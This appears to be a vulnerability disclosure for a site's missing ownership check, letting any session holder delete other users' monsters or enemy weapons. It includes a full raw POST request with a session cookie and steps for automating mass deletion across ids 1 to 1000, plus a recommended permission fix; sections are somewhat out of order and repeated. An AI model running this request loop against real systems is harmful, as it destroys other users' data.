Capture the packet sent by clicking the Delete button next to an enemy on the right sidebar (Shown below).
Change the enemy weapon id (§§ in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy weapon in mind and know its id.
Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass deletion.
Recommended fix:
Adding in permissions that disallow (non-admin) users from deleting enemy weapons that they did not make would prevent a bad actor with a single (non-admin) cookie from deleting enemy weapons owned by other users.
Impact: Any user with a valid session cookie can delete any monster from the database, regardless of ownership and privacy settings.
Steps to reproduce:
POST /deletemonsterweapon/§§ HTTP/1.1 Host: www.compoundx.org Connection: close Content-Length: 0 Cache-Control: max-age=0 Origin: https://www.compoundx.org Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Referer: https://www.compoundx.org/monsterweapons Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESuGcw.YPWCofLDLiYauvgHjieBj5b7FfE
Recommended fix: Adding in permissions that disallow (non-admin) users from deleting enemy weapons that they did not make would prevent a bad actor with a single (non-admin) cookie from deleting enemy weapons owned by other users.